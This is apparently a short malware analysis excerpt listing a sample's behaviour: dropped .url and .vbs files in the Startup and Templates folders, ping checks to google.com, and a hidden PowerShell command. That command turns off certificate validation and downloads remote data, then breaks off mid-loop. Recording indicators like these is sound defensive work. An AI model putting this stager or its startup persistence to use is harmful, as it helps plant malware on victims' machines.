Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\mifnqwu.url
- %APPDATA%\microsoft\windows\templates\mifnqwu.vbs
- DNS ASK google.com
- '<SYSTEM32>\ping.exe' google.com' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$JtqnNJWtBOGu=(New-Object Net.WebClient).DownloadData('http://')#for ($i=0;$i -lt $JtqnNJWtBOGu.Length;$i++){$JtqnNJWtBOGu...' (with hidden window)
- '<SYSTEM32>\ping.exe' google.com